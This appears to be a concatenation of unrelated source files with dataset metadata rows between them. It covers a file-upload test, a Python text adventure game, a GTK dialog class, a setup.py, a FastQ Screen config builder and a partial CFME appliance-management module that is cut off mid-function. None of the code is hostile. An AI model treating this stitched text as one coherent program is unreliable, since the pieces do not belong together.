assert j['type'] == 'file'
assert j['filename'] == 'testæøå.txt'
def thumbnail():
r = requests.post(
'http://127.0.0.1:{}/store'.format(config['port']),
files={'file': open('test.png', 'rb')}
)
logging.debug(r.text)
logging.debug(r.status_code)
r.raise_for_status()
assert r.status_code == 201
d = r.json()
assert d[0]['hash'] == '1171aad9f52efe4f577ccabec4aaeb063e28a80978f3853721381bca2b5fe501'
assert d[0]['type'] == 'image'
assert d[0]['width'] == 5
assert d[0]['height'] == 5
r = requests.get(
'http://127.0.0.1:{}/1171aad9f52efe4f577ccabec4aaeb063e28a80978f3853721381bca2b5fe501@.jpg'.format(config['port']),
)
logging.debug(r.text)
logging.debug(r.status_code)
assert r.status_code == 200
if __name__ == '__main__':
config_load()
logger.set_logger(None)
upload_multipart()
upload_stream()
thumbnail() | mit | -842,656,900,377,164,300 | 31.48 | 123 | 0.540041 | false |
idivanov/amazing-game | game.py | 1 | 6382 | from battle import *
from weapon import *
import maps
import random
class Game():
def __init__(self, map):
self.map = map
self.player_location = 0
self.character = None
def print_map(self):
'''printing the map'''
self.update_location()
for row in range(maps.ROWS):
line = ""
for _ in range(maps.COLUMNS):
line += self.map[row*10 + _]
print(line)
print()
def update_location(self):
'''Updating the location of the player in the map'''
new_map = ""
for _ in range(50):
if _ == self.player_location:
new_map += 'P'
elif self.map[_] == 'P' and _ is not self.player_location:
new_map += '.'
else:
new_map += self.map[_]
self.map = new_map
def move_right(self):
'''Move to the right square if it is available and not blocked'''
if ((maps.COLUMNS - 1) - self.player_location) % maps.COLUMNS == 0\
and self.player_location is not 0:
return False
if self.map[self.player_location + 1] == '#':
return False
self.player_location += 1
self.update_location()
return True
def move_left(self):
'''Move to the left square if it is available and not blocked'''
if self.player_location % maps.COLUMNS == 0:
return False
if self.map[self.player_location - 1] == '#':
return False
self.player_location -= 1
self.update_location()
return True
def move_up(self):
'''Move to the up square if it is available and not blocked'''
if self.player_location < maps.COLUMNS:
return False
if self.map[self.player_location - maps.COLUMNS] == '#':
return False
self.player_location -= maps.COLUMNS
self.update_location()
return True
def move_down(self):
'''Move to the down square if it is available and not blocked'''
if self.player_location >= (maps.ROWS-1) * maps.COLUMNS:
return False
if self.map[self.player_location + maps.COLUMNS] == '#':
return False
self.player_location += maps.COLUMNS
self.update_location()
return True
def user_input(self, message):
return input(message + "\nEnter here: ")
def select_weapon(self, weapon=None):
'''Choosing your weapon'''
if weapon is not None:
self.character.equip_weapon(weapon)
return
weapon_description =\
"Now select your weapon. You can choose from:\n" +\
"m - Mace (15 hp, 15 attack_power, 5spell_power, 5 armor)\n" +\
"a - Axe (20 hp, 15 attack_power, 0 spell_power, 10 armor)\n" +\
"d - Dagger (10 hp, 5 attack_power, 25 spell_power, 5 armor)\n" +\
"s - Shield (25 hp, 5 attack_power, 5 spell_power, 40 armor)\n"
user_input = self.user_input(weapon_description)
if user_input == 'm':
self.character.equip_weapon(Weapon(15, 15, 5, 5))
elif user_input == 'a':
self.character.equip_weapon(Weapon(20, 15, 0, 10))
elif user_input == 'd':
self.character.equip_weapon(Weapon(10, 5, 25, 5))
elif user_input == 's':
self.character.equip_weapon(Weapon(25, 5, 5, 40))
else:
self.character.equip_weapon(Weapon(10, 10, 10, 10))
def select_character(self, character=None, weapon=None):
'''Selecting your character'''
if character is not None:
self.character = character
self.select_weapon(weapon)
return
class_description = "You must select your character now." + \
" Choose between Mage, Warrior and Paladin\n" + \
"Press m,w or p for each class"
name_description = "Please enter your name"
character_class = self.user_input(class_description)
character_name = self.user_input(name_description)
if character_class is 'p':
self.character = Paladin(character_name)
elif character_class is 'm':
self.character = Mage(character_name)
else:
self.character = Warrior(character_name)
self.select_weapon()
def play(self, is_test=False):
'''Playing the game untill you die or reach the treasure'''
turn_description = "MOVE! Press: " + \
"\nw - up\na - left\ns - down\nd - right\n"
if is_test is False:
self.select_character()
user_input = ""
while self.player_location != 49 and is_test is False:
self.print_map()
user_input = self.user_input(turn_description)
if user_input == 'w':
self.move_up()
elif user_input == 's':
self.move_down()
elif user_input == 'a':
self.move_left()
elif user_input == 'd':
self.move_right()
else:
continue
self.print_map()
luck = int(random.uniform(1, 4))
if luck == 1:
print ("You are very lucky and here are no enemies!\n" +
" You may continue your jorney!")
continue
elif luck == 2:
print ("You will fight a warlock. Good luck!")
fight = Battle(self.character, Warlock())
fight.start()
print (fight.result())
elif luck == 3:
print ("You will fight a berserker. Good luck!")
fight = Battle(self.character, Berserker())
fight.start()
print (fight.result())
if self.character.is_alive() == False:
print ("You are dead.")
return "You lost!"
if self.player_location == 49 and is_test is False:
print("You reached the goal. Now you will fight with boss")
fight = Battle(self.character, Boss())
fight.start()
return (fight.result())
else:
print("You must have found a bug in the game. Congrats anyway!")
return "You won!" if self.character.is_alive() else "You lost!"
| gpl-3.0 | -4,598,051,306,032,373,000 | 33.874317 | 78 | 0.532435 | false |
niavok/perroquet | perroquetlib/gui/gui_message_dialog.py | 1 | 2149 | # -*- coding: utf-8 -*-
# Copyright (C) 2009-2011 Frédéric Bertolus.
#
# This file is part of Perroquet.
#
# Perroquet is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# Perroquet is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with Perroquet. If not, see <http://www.gnu.org/licenses/>.
import gettext
import gtk
from perroquetlib.config import config
_ = gettext.gettext
class GuiMessageDialog:
def __init__(self, parent):
self.config = config
self.parent = parent
self.builder = gtk.Builder()
self.builder.set_translation_domain("perroquet")
self.builder.add_from_file(self.config.get("ui_message_path"))
self.builder.connect_signals(self)
self.dialog = self.builder.get_object("dialog_message")
self.dialog.set_modal(True)
self.dialog.set_transient_for(self.parent)
self.result = False
def set_message(self, title, message):
self.builder.get_object("label_message").set_text(message)
self.dialog.set_title(title)
def run(self):
self.dialog.run()
self.dialog.destroy()
def on_button_reset_ok_clicked(self, widget, data=None):
self.dialog.response(gtk.RESPONSE_OK)
def on_button_reset_cancel_clicked(self, widget, data=None):
self.result = None
self.dialog.response(gtk.RESPONSE_CANCEL)
def on_entry_password_activate(self, widget, data=None):
self.result = self.builder.get_object("entry_password").get_text()
self.dialog.response(gtk.RESPONSE_OK)
def on_dialog_password_delete_event(self, widget, data=None):
self.result = None
self.dialog.response(gtk.RESPONSE_CANCEL)
return True
| gpl-3.0 | -2,429,260,379,607,803,400 | 32.546875 | 74 | 0.690265 | false |
2degrees/twapi-users | setup.py | 1 | 1970 | ##############################################################################
#
# Copyright (c) 2015, 2degrees Limited.
# All Rights Reserved.
#
# This file is part of twapi-users
# <https://github.com/2degrees/twapi-users>, which is subject to the
# provisions of the BSD at
# <http://dev.2degreesnetwork.com/p/2degrees-license.html>. A copy of the
# license should accompany this distribution. THIS SOFTWARE IS PROVIDED "AS IS"
# AND ANY AND ALL EXPRESS OR IMPLIED WARRANTIES ARE DISCLAIMED, INCLUDING, BUT
# NOT LIMITED TO, THE IMPLIED WARRANTIES OF TITLE, MERCHANTABILITY, AGAINST
# INFRINGEMENT, AND FITNESS FOR A PARTICULAR PURPOSE.
#
##############################################################################
import os
from setuptools import find_packages
from setuptools import setup
_CURRENT_DIR_PATH = os.path.abspath(os.path.dirname(__file__))
_README_CONTENTS = open(os.path.join(_CURRENT_DIR_PATH, 'README.rst')).read()
_VERSION = \
open(os.path.join(_CURRENT_DIR_PATH, 'VERSION.txt')).readline().rstrip()
_LONG_DESCRIPTION = _README_CONTENTS
setup(
name='twapi_users',
version=_VERSION,
description='API client for user-related endpoints of the 2degrees '
'platform',
long_description=_LONG_DESCRIPTION,
classifiers=[
'Development Status :: 3 - Alpha',
'Intended Audience :: Developers',
'License :: OSI Approved :: BSD License',
'Natural Language :: English',
'Programming Language :: Python :: 3 :: Only',
],
keywords='2degrees',
author='2degrees Limited',
author_email='[email protected]',
url='https://github.com/2degrees/twapi-users/',
license='BSD (http://dev.2degreesnetwork.com/p/2degrees-license.html)',
packages=find_packages(exclude=['tests']),
install_requires=[
'twapi-connection >= 2.0a2',
'pyrecord >= 1.0a1',
'voluptuous >= 0.10.5',
],
test_suite='nose.collector',
)
| bsd-3-clause | -7,853,972,193,506,642,000 | 34.818182 | 79 | 0.62335 | false |
mlesche/deep_seq_pipeline | deep_seq_pipeline/src/configfile/createconfigFastqScreen.py | 1 | 7124 | #!/usr/bin/env python
'''
The MIT License (MIT)
Copyright (c) <2014> <Mathias Lesche>
Permission is hereby granted, free of charge, to any person obtaining a copy
of this software and associated documentation files (the "Software"), to deal
in the Software without restriction, including without limitation the rights
to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
copies of the Software, and to permit persons to whom the Software is
furnished to do so, subject to the following conditions:
The above copyright notice and this permission notice shall be included in
all copies or substantial portions of the Software.
THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN
THE SOFTWARE.
contact: mat.lesche(at)gmail.com
'''
''' python modules '''
import logging
from argparse import ArgumentParser
from argparse import RawDescriptionHelpFormatter
from types import NoneType
''' own modules '''
from configfile.configbuild import ConfigBuild
from main.information import Information
from main.io_module import add_FilestoList_recursive_depth
from main.io_module import check_Directorylist
from main.io_module import check_Fileslist
from main.main_logger import MainLogger
class Parser(object):
def __init__(self):
self.__parser = ArgumentParser(description="""
Scripts builds the configuration file for the
Fastq Screen Pipeline. File can be built alone
as well, but scripts helps narrowing things down.""", formatter_class=RawDescriptionHelpFormatter)
self.initialiseParser()
self.__log = False
self.__logger = ''
self.start_logging()
self.__directory = ''
self.__files = ''
self.__filelist = []
self.__workdir = ''
self.__readtype = ''
def initialiseParser(self):
self.__parser.add_argument('-d', '--directory', type=str, metavar='DIRECTORY', dest='directory', nargs= '+', help= "directories with fastq files (' ' separated)")
self.__parser.add_argument('-f', '--files', type=str, metavar='FILE', dest='files', nargs= '+', help="list of fastq files(' ' separated)")
self.__parser.add_argument("-r", "--read-type", dest= 'readtype', choices = ('se', 'pe'), required = True, help= 'single-end or paired-end')
self.__parser.add_argument("-w", "--workdir", type= str, metavar= 'DIRECTORY', dest='workdir', required= True, help='all files of the project will be stored here')
def parse(self, inputstring = None):
if isinstance(inputstring, NoneType):
self.__options = self.__parser.parse_args()
else:
self.__options = self.__parser.parse_args(inputstring)
def getParser(self):
return self.__parser
def start_logging(self):
self.__log = True
self.__logger = logging.getLogger('pipeline.configfile.fastq_screen')
def show_log(self, level, message):
if self.__log:
if level == 'debug':
self.__logger.debug(message)
elif level == 'info':
self.__logger.info(message)
elif level == 'warning':
self.__logger.warning(message)
elif level == 'error':
self.__logger.error(message)
elif level == 'critical':
self.__logger.critical(message)
else:
print message
def checkDirectory(self):
filelist = []
if isinstance(self.__directory, NoneType):
return filelist
dirlist = self.__directory
good, bad = check_Directorylist(dirlist)
for i in good:
self.show_log('info', "valid directory: {0}".format(i))
for i in bad:
self.show_log('warning', "check directory: {0}".format(i))
self.__directory = good
if len(self.__directory) == 0:
self.show_log('warning', "no directory given with -d was valid")
def checkFiles(self):
if isinstance(self.__files, NoneType):
return []
good, bad = check_Fileslist(self.__files)
goodfiles = [i for i in good if i.endswith(('fastq.gz', 'fastq', 'fq.gz', 'fq'))]
badfiles = [i for i in good if not i.endswith(('fastq.gz', 'fastq', 'fq.gz', 'fq'))]
badfiles.extend(bad)
# for i in goodfiles:
# self.show_log('info', "{0}.{1} - valid file: {2}".format(self.__classname, getframe().f_code.co_name, i))
for i in badfiles:
self.show_log('warning', "check file: {0}".format(i))
self.__files = goodfiles
def check_workdir(self):
good = check_Directorylist((self.__workdir, ))[0]
if len(good) != 1:
self.show_log('error', "check output directory: {0}".format(self.__workdir))
exit(2)
else:
self.__workdir = good[0]
self.show_log('info', "output directory: {0}".format(self.__workdir))
def build_filelist(self):
for dirname in self.__directory:
self.__filelist.extend(add_FilestoList_recursive_depth(dirname, [], [], 0, 1))
self.__filelist.extend(self.__files)
def main(self):
self.__readtype = self.__options.readtype
self.__workdir = self.__options.workdir
self.show_log('info', 'files will be treated as: {0}'.format(self.__readtype))
self.check_workdir()
if not isinstance(self.__options.directory, NoneType):
self.__directory = self.__options.directory
self.checkDirectory()
if not isinstance(self.__options.files, NoneType):
self.__files = self.__options.files
self.checkFiles()
self.build_filelist()
if len(self.__filelist) == 0:
self.show_log('error', "neither directory (-d) nor files (-f) provided files")
exit(2)
else:
self.show_log('info', "{0} files will be used for fastq screen process".format(len(self.__filelist)))
def get_filelist(self):
return self.__filelist
def get_readtype(self):
return self.__readtype
def get_workdir(self):
return self.__workdir
filelist = property(get_filelist, None, None, None)
readtype = property(get_readtype, None, None, None)
workdir = property(get_workdir, None, None, None)
class ConfigBuildFastqScreen(ConfigBuild):
def __init__(self, workdir, filelist, seqtype):
super(ConfigBuildFastqScreen, self).__init__(workdir)
self.start_logging('pipeline.configfile.fastq_screen')
self._filelist = filelist
self._seqtype = seqtype
self._configfilename = 'config_fastqscreen.txt'
def main(self):
self.process_main()
self.process_fastq(self._filelist, True)
self.process_fastqscreen(self._seqtype)
self._input = '{0}\n{1}\n{2}'.format(self._mainstring, self._fastqstring, self._fastqscreenstring)
self.write_config()
if __name__ == '__main__':
mainlog = MainLogger('', False)
parseinst = Parser()
parseinst.parse()
parseinst.main()
inst = ConfigBuildFastqScreen(parseinst.workdir, parseinst.filelist, parseinst.readtype)
inst.main()
Information.SEQTYPE = parseinst.readtype | mit | 661,324,221,369,928,000 | 33.926471 | 171 | 0.675463 | false |
psav/cfme_tests | cfme/utils/appliance/__init__.py | 1 | 123036 | import json
import logging
import socket
import traceback
from copy import copy
from datetime import datetime
from tempfile import NamedTemporaryFile
from textwrap import dedent
from time import sleep, time
import attr
import dateutil.parser
import fauxfactory
import os
import re
import requests
import sentaku
import six
import warnings
import yaml
from cached_property import cached_property
from debtcollector import removals
from manageiq_client.api import APIException, ManageIQClient as VanillaMiqApi
from six.moves.urllib.parse import urlparse
from werkzeug.local import LocalStack, LocalProxy
from cfme.utils import clear_property_cache
from cfme.utils import conf, ssh, ports
from cfme.utils.datafile import load_data_file
from cfme.utils.log import logger, create_sublogger, logger_wrap
from cfme.utils.net import net_check
from cfme.utils.path import data_path, patches_path, scripts_path, conf_path
from cfme.utils.ssh import SSHTail
from cfme.utils.version import Version, get_stream, pick
from cfme.utils.wait import wait_for, TimedOutError
from cfme.fixtures import ui_coverage
from cfme.fixtures.pytest_store import store
from .db import ApplianceDB
from .implementations.rest import ViaREST
from .implementations.ssui import ViaSSUI
from .implementations.ui import ViaUI
from .services import SystemdService
RUNNING_UNDER_SPROUT = os.environ.get("RUNNING_UNDER_SPROUT", "false") != "false"
# EMS types recognized by IP or credentials
RECOGNIZED_BY_IP = [
"InfraManager", "ContainerManager", "Openstack::CloudManager"
]
RECOGNIZED_BY_CREDS = ["CloudManager", "Nuage::NetworkManager"]
# A helper for the IDs
SEQ_FACT = 1e12
def _current_miqqe_version():
"""Parses MiqQE JS patch version from the patch file
Returns: Version as int
"""
with patches_path.join('miq_application.js.diff').open("r") as f:
match = re.search("MiqQE_version = (\d+);", f.read(), flags=0)
version = int(match.group(1))
return version
current_miqqe_version = _current_miqqe_version()
class MiqApi(VanillaMiqApi):
def get_entity_by_href(self, href):
"""Parses the collections"""
parsed = urlparse(href)
# TODO: Check the netloc, scheme
path = [step for step in parsed.path.split('/') if step]
# Drop the /api
path = path[1:]
collection = getattr(self.collections, path.pop(0))
entity = collection(int(path.pop(0)))
if path:
raise ValueError('Subcollections not supported! ({})'.format(parsed.path))
return entity
class ApplianceException(Exception):
pass
class ApplianceConsole(object):
"""ApplianceConsole is used for navigating and running appliance_console commands against an
appliance."""
def __init__(self, appliance):
self.appliance = appliance
def timezone_check(self, timezone):
channel = self.appliance.ssh_client.invoke_shell()
channel.settimeout(20)
channel.send("ap")
result = ''
try:
while True:
result += channel.recv(1)
if ("{}".format(timezone[0])) in result:
break
except socket.timeout:
pass
logger.debug(result)
def run_commands(self, commands, autoreturn=True, timeout=10, channel=None):
if not channel:
channel = self.appliance.ssh_client.invoke_shell()
self.commands = commands
for command in commands:
if isinstance(command, basestring):
command_string, timeout = command, timeout
else:
command_string, timeout = command
channel.settimeout(timeout)
if autoreturn:
command_string = (command_string + '\n')
channel.send("{}".format(command_string))
result = ''
try:
while True:
result += channel.recv(1)
if 'Press any key to continue' in result:
break
except socket.timeout:
pass
logger.debug(result)
class ApplianceConsoleCli(object):
def __init__(self, appliance):
self.appliance = appliance
def _run(self, appliance_console_cli_command):
return self.appliance.ssh_client.run_command(
"appliance_console_cli {}".format(appliance_console_cli_command))
def set_hostname(self, hostname):
self._run("--host {host}".format(host=hostname))
def configure_appliance_external_join(self, dbhostname,
username, password, dbname, fetch_key, sshlogin, sshpass):
self._run("--hostname {dbhostname} --username {username} --password {password}"
" --dbname {dbname} --verbose --fetch-key {fetch_key} --sshlogin {sshlogin}"
" --sshpassword {sshpass}".format(dbhostname=dbhostname, username=username,
password=password, dbname=dbname, fetch_key=fetch_key, sshlogin=sshlogin,
sshpass=sshpass))
def configure_appliance_external_create(self, region, dbhostname,
username, password, dbname, fetch_key, sshlogin, sshpass):
self._run("--region {region} --hostname {dbhostname} --username {username}"
" --password {password} --dbname {dbname} --verbose --fetch-key {fetch_key}"
" --sshlogin {sshlogin} --sshpassword {sshpass}".format(
region=region, dbhostname=dbhostname, username=username, password=password,
dbname=dbname, fetch_key=fetch_key, sshlogin=sshlogin, sshpass=sshpass))
def configure_appliance_internal(self, region, dbhostname, username, password, dbname, dbdisk):
self._run("--region {region} --internal --hostname {dbhostname} --username {username}"
" --password {password} --dbname {dbname} --verbose --dbdisk {dbdisk}".format(
region=region, dbhostname=dbhostname, username=username, password=password,
dbname=dbname, dbdisk=dbdisk))
def configure_appliance_internal_fetch_key(self, region, dbhostname,
username, password, dbname, dbdisk, fetch_key, sshlogin, sshpass):
self._run("--region {region} --internal --hostname {dbhostname} --username {username}"
" --password {password} --dbname {dbname} --verbose --dbdisk {dbdisk} --fetch-key"
" {fetch_key} --sshlogin {sshlogin} --sshpassword {sshpass}".format(
region=region, dbhostname=dbhostname, username=username, password=password,
dbname=dbname, dbdisk=dbdisk, fetch_key=fetch_key, sshlogin=sshlogin,
sshpass=sshpass))
def configure_appliance_dedicated_db(self, username, password, dbname, dbdisk):
self._run("--internal --username {username} --password {password}"
" --dbname {dbname} --verbose --dbdisk {dbdisk} --key --standalone".format(
username=username, password=password, dbname=dbname, dbdisk=dbdisk))
def configure_ipa(self, ipaserver, ipaprincipal, ipapassword, ipadomain=None, iparealm=None):
cmd_result = self._run(
'--ipaserver {s} --ipaprincipal {u} --ipapassword {p} {d} {r}'
.format(s=ipaserver, u=ipaprincipal, p=ipapassword,
d='--ipadomain {}'.format(ipadomain) if ipadomain else '',
r='--iparealm {}'.format(iparealm) if iparealm else ''))
logger.debug('IPA configuration output: %s', str(cmd_result))
assert cmd_result.success
assert 'ipa-client-install exit code: 1' not in cmd_result.output
self.appliance.sssd.wait_for_running()
assert self.appliance.ssh_client.run_command("cat /etc/ipa/default.conf "
"| grep 'enable_ra = True'")
def configure_appliance_dedicated_ha_primary(
self, username, password, reptype, primhost, node, dbname):
self._run("--username {username} --password {password} --replication {reptype}"
" --primary-host {primhost} --cluster-node-number {node} --auto-failover --verbose"
" --dbname {dbname}".format(
username=username, password=password, reptype=reptype, primhost=primhost, node=node,
dbname=dbname))
def configure_appliance_dedicated_ha_standby(
self, username, password, reptype, primhost, standhost, node, dbname, dbdisk):
self._run("--internal --username {username} --password {password} --replication {reptype}"
" --primary-host {primhost} --standby-host {standhost} --cluster-node-number {node}"
" --auto-failover --dbname {dbname} --verbose --dbdisk {dbdisk}"
" --standalone".format(username=username, password=password, reptype=reptype,
primhost=primhost, standhost=standhost, node=node, dbname=dbname, dbdisk=dbdisk))
def uninstall_ipa_client(self):
assert self._run("--uninstall-ipa")
assert not self.appliance.ssh_client.run_command("cat /etc/ipa/default.conf")
class IPAppliance(object):
"""IPAppliance represents an already provisioned cfme appliance whos provider is unknown
but who has an IP address. This has a lot of core functionality that Appliance uses, since
it knows both the provider, vm_name and can there for derive the IP address.
Args:
hostname: The IP address or host name of the provider
ui_protocol: The protocol used in the URL
ui_port: The port where the UI runs.
browser_steal: If True then then current browser is killed and the new appliance
is used to generate a new session.
container: If the appliance is running as a container or as a pod, specifies its name.
project: openshift's project where the appliance is deployed
openshift_creds: If the appliance runs as a project on openshift, provides credentials for
the openshift host so the framework can interact with the project.
db_host: If the database is located somewhere else than on the appliance itself, specify
the host here.
db_port: Database port.
ssh_port: SSH port.
"""
_nav_steps = {}
evmserverd = SystemdService.declare(unit_name='evmserverd')
httpd = SystemdService.declare(unit_name='httpd')
sssd = SystemdService.declare(unit_name='sssd')
db = ApplianceDB.declare()
CONFIG_MAPPING = {
'hostname': 'hostname',
'ui_protocol': 'ui_protocol',
'ui_port': 'ui_port',
'browser_steal': 'browser_steal',
'container': 'container',
'pod': 'container',
'openshift_creds': 'openshift_creds',
'is_dev': 'is_dev',
'db_host': 'db_host',
'db_port': 'db_port',
'ssh_port': 'ssh_port',
'project': 'project',
}
CONFIG_NONGLOBAL = {'hostname'}
PROTOCOL_PORT_MAPPING = {'http': 80, 'https': 443}
CONF_FILES = {
'upstream_templates': '/var/www/miq/system/TEMPLATE',
'downstream_templates': '/opt/rh/cfme-appliance/TEMPLATE',
'pam_httpd_auth': '/etc/pam.d/httpd-auth',
'httpd_remote_user': '/etc/httpd/conf.d/manageiq-remote-user.conf',
'httpd_ext_auth': '/etc/httpd/conf.d/manageiq-external-auth.conf',
'openldap': '/etc/openldap/ldap.conf',
'sssd': '/etc/sssd/sssd.conf'
}
@property
def as_json(self):
"""Dumps the arguments that can create this appliance as a JSON. None values are ignored."""
return json.dumps({
k: getattr(self, k)
for k in set(self.CONFIG_MAPPING.values())})
@classmethod
def from_json(cls, json_string):
return cls(**json.loads(json_string))
def __init__(
self, hostname, ui_protocol='https', ui_port=None, browser_steal=False, project=None,
container=None, openshift_creds=None, db_host=None, db_port=None, ssh_port=None,
is_dev=False
):
if not isinstance(hostname, six.string_types):
raise TypeError('Appliance\'s hostname must be a string!')
self.hostname = hostname
if ui_protocol not in self.PROTOCOL_PORT_MAPPING:
raise TypeError(
'Wrong protocol {!r} passed, expected {!r}'.format(
ui_protocol, list(self.PROTOCOL_PORT_MAPPING.keys())))
self.ui_protocol = ui_protocol
self.ui_port = ui_port or self.PROTOCOL_PORT_MAPPING[ui_protocol]
self.ssh_port = ssh_port or ports.SSH
self.db_port = db_port or ports.DB
self.db_host = db_host
self.browser = ViaUI(owner=self)
self.ssui = ViaSSUI(owner=self)
self.rest_context = ViaREST(owner=self)
self.rest_context.strict_calls = False
self.context = MiqImplementationContext.from_instances(
[self.browser, self.ssui, self.rest_context])
from cfme.modeling.base import EntityCollections
self.collections = EntityCollections.for_appliance(self)
self.browser_steal = browser_steal
self.container = container
self.project = project
self.openshift_creds = openshift_creds or {}
self.is_dev = is_dev
self._user = None
self.appliance_console = ApplianceConsole(self)
self.appliance_console_cli = ApplianceConsoleCli(self)
if self.openshift_creds:
self.is_pod = True
else:
self.is_pod = False
def unregister(self):
""" unregisters appliance from RHSM/SAT6 """
self.ssh_client.run_command('subscription-manager remove --all')
self.ssh_client.run_command('subscription-manager unregister')
self.ssh_client.run_command('subscription-manager clean')
self.ssh_client.run_command('mv -f /etc/rhsm/rhsm.conf.kat-backup /etc/rhsm/rhsm.conf')
self.ssh_client.run_command('rpm -qa | grep katello-ca-consumer | xargs rpm -e')
def is_registration_complete(self, used_repo_or_channel):
""" Checks if an appliance has the correct repos enabled with RHSM or SAT6 """
result = self.ssh_client.run_command('yum repolist enabled')
# Check that the specified (or default) repo (can be multiple, separated by a space)
# is enabled and that there are packages available
for repo in used_repo_or_channel.split(' '):
if (repo not in result.output) or (not re.search(r'repolist: [^0]', result.output)):
return False
return True
@property
def default_zone(self):
return self.appliance.server.zone
@property
def server(self):
return self.collections.servers.get_master()
@property
def user(self):
from cfme.base.credential import Credential
if self._user is None:
# Admin by default
username = conf.credentials['default']['username']
password = conf.credentials['default']['password']
logger.info(
'%r.user was set to None before, therefore generating an admin user: %s/%s',
self, username, password)
cred = Credential(principal=username, secret=password)
user = self.collections.users.instantiate(
credential=cred, name='Administrator'
)
self._user = user
return self._user
@user.setter
def user(self, user_object):
if user_object is None:
logger.info('%r.user set to None, will be set to admin on next access', self)
self._user = user_object
@property
def appliance(self):
return self
def __repr__(self):
# TODO: Put something better here. This solves the purpose temporarily.
return '{}.from_json({!r})'.format(type(self).__name__, self.as_json)
def __call__(self, **kwargs):
"""Syntactic sugar for overriding certain instance variables for context managers.
Currently possible variables are:
* `browser_steal`
"""
self.browser_steal = kwargs.get("browser_steal", self.browser_steal)
return self
def __enter__(self):
""" This method will replace the current appliance in the store """
stack.push(self)
return self
def _screenshot_capture_at_context_leave(self, exc_type, exc_val, exc_tb):
try:
from cfme.fixtures.artifactor_plugin import fire_art_hook
from pytest import config
from fixture.pytest_store import store
except ImportError:
logger.info('Not inside pytest run, ignoring')
return
if (
exc_type is not None and not RUNNING_UNDER_SPROUT):
from cfme.utils.browser import take_screenshot
logger.info("Before we pop this appliance, a screenshot and a traceback will be taken.")
ss, ss_error = take_screenshot()
full_tb = "".join(traceback.format_tb(exc_tb))
short_tb = "{}: {}".format(exc_type.__name__, str(exc_val))
full_tb = "{}\n{}".format(full_tb, short_tb)
g_id = "appliance-cm-screenshot-{}".format(fauxfactory.gen_alpha(length=6))
fire_art_hook(
config, 'filedump',
slaveid=store.slaveid,
description="Appliance CM error traceback", contents=full_tb, file_type="traceback",
display_type="danger", display_glyph="align-justify", group_id=g_id)
if ss:
fire_art_hook(
config, 'filedump',
slaveid=store.slaveid, description="Appliance CM error screenshot",
file_type="screenshot", mode="wb", contents_base64=True, contents=ss,
display_glyph="camera", group_id=g_id)
if ss_error:
fire_art_hook(
config, 'filedump',
slaveid=store.slaveid,
description="Appliance CM error screenshot failure", mode="w",
contents_base64=False, contents=ss_error, display_type="danger", group_id=g_id)
elif exc_type is not None:
logger.info("Error happened but we are not inside a test run so no screenshot now.")
def __exit__(self, exc_type, exc_val, exc_tb):
try:
self._screenshot_capture_at_context_leave(exc_type, exc_val, exc_tb)
except Exception:
# repr is used in order to avoid having the appliance object in the log record
logger.exception("taking a screenshot for %s failed", repr(self))
finally:
assert stack.pop() is self, 'appliance stack inconsistent'
def __eq__(self, other):
return isinstance(other, IPAppliance) and self.hostname == other.hostname
def __ne__(self, other):
return not self.__eq__(other)
def __hash__(self):
return hash(self.hostname)
@cached_property
def rest_logger(self):
return create_sublogger('rest-api')
# Configuration methods
@logger_wrap("Configure IPAppliance: {}")
def configure(self, log_callback=None, **kwargs):
"""Configures appliance - database setup, rename, ntp sync
Utility method to make things easier.
Note:
db_address, name_to_set are not used currently.
Args:
db_address: Address of external database if set, internal database if ``None``
(default ``None``)
name_to_set: Name to set the appliance name to if not ``None`` (default ``None``)
region: Number to assign to region (default ``0``)
fix_ntp_clock: Fixes appliance time if ``True`` (default ``True``)
loosen_pgssl: Loosens postgres connections if ``True`` (default ``True``)
key_address: Fetch encryption key from this address if set, generate a new key if
``None`` (default ``None``)
on_openstack: If appliance is running on Openstack provider (default ``False``)
on_gce: If appliance is running on GCE provider (default ``False``)
"""
log_callback("Configuring appliance {}".format(self.hostname))
loosen_pgssl = kwargs.pop('loosen_pgssl', True)
fix_ntp_clock = kwargs.pop('fix_ntp_clock', True)
region = kwargs.pop('region', 0)
key_address = kwargs.pop('key_address', None)
db_address = kwargs.pop('db_address', None)
on_openstack = kwargs.pop('on_openstack', False)
on_gce = kwargs.pop('on_gce', False)
with self as ipapp:
ipapp.wait_for_ssh()
# Debugging - ifcfg-eth0 overwritten by unknown process
# Rules are permanent and will be reloade after machine reboot
self.ssh_client.run_command(
"cp -pr /etc/sysconfig/network-scripts/ifcfg-eth0 /var/tmp", ensure_host=True)
self.ssh_client.run_command(
"echo '-w /etc/sysconfig/network-scripts/ifcfg-eth0 -p wa' >> "
"/etc/audit/rules.d/audit.rules", ensure_host=True)
self.ssh_client.run_command("systemctl daemon-reload", ensure_host=True)
self.ssh_client.run_command("service auditd restart", ensure_host=True)
ipapp.wait_for_ssh()
self.deploy_merkyl(start=True, log_callback=log_callback)
if fix_ntp_clock and not self.is_pod:
self.fix_ntp_clock(log_callback=log_callback)
# TODO: Handle external DB setup
# This is workaround for appliances to use only one disk for the VMDB
# If they have been provisioned with a second disk in the infra,
# 'self.unpartitioned_disks' should exist and therefore this won't run.
if self.is_downstream and not self.unpartitioned_disks:
self.db.create_db_lvm()
self.db.setup(region=region, key_address=key_address,
db_address=db_address, is_pod=self.is_pod)
if on_gce:
# evm serverd does not auto start on GCE instance..
self.start_evm_service(log_callback=log_callback)
self.wait_for_evm_service(timeout=1200, log_callback=log_callback)
# Some conditionally ran items require the evm service be
# restarted:
restart_evm = False
if loosen_pgssl:
self.db.loosen_pgssl()
restart_evm = True
if self.version >= '5.8':
self.configure_vm_console_cert(log_callback=log_callback)
